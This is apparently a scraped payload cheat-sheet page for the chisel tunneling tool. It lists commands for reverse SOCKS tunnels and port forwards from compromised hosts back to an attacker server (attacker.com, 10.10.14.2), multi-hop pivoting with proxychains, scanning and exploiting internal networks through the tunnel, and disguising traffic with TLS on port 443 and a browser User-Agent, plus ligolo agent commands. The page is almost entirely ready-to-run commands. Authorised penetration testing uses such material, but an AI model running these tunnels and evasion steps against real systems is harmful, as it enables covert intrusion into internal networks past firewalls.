$loading...
Complete chisel reference for TCP/SOCKS tunneling, reverse port forwarding, multi-hop pivoting, and firewall evasion. (25 payloads)
chisel server -p 8080 --reversechisel server -p 443 --reverse --tls-domain attacker.comchisel server -p 8080 --reverse --auth user:passchisel server -p 8080 --reverse --socks5chisel client 10.10.14.2:8080 R:sockschisel client 10.10.14.2:8080 R:1080:sockschisel client 10.10.14.2:8080 R:3389:192.168.1.100:3389chisel client 10.10.14.2:8080 R:8888:127.0.0.1:8080chisel client 10.10.14.2:8080 3000:192.168.1.100:3000chisel client 10.10.14.2:8080 --auth user:pass R:socksecho "socks5 127.0.0.1 1080" >> /etc/proxychains4.confproxychains nmap -sT -Pn 192.168.1.0/24proxychains curl http://192.168.1.100/proxychains python3 exploit.pyproxychains ssh [email protected]# Hop 1 (Attacker → Target1):
chisel server -p 8080 --reverse # attacker
chisel client 10.10.14.2:8080 R:1080:socks # target1# Hop 2 (Target1 → Target2 via Hop1):
proxychains chisel client 10.10.14.2:8081 R:1081:socks # run on target1 via socksproxychains4 -f /etc/proxychains4.conf nmap -sT 172.16.0.0/24chisel server -p 443 --reversechisel server -p 80 --reversechisel client --header "User-Agent: Mozilla/5.0" attacker.com:443 R:sockschisel server -p 8080 --reverse --tls-skip-verify./proxy -selfcert -laddr 0.0.0.0:11601 # attacker./agent -connect 10.10.14.2:11601 -ignore-cert # targetip route add 192.168.1.0/24 dev ligolo # attackerLevel up your security testing
Install the CLI
npx payload-playgroundExplore All Tools
Encoding, hashing, JWT & more
Browse Cheat Sheets
Quick-reference payload guides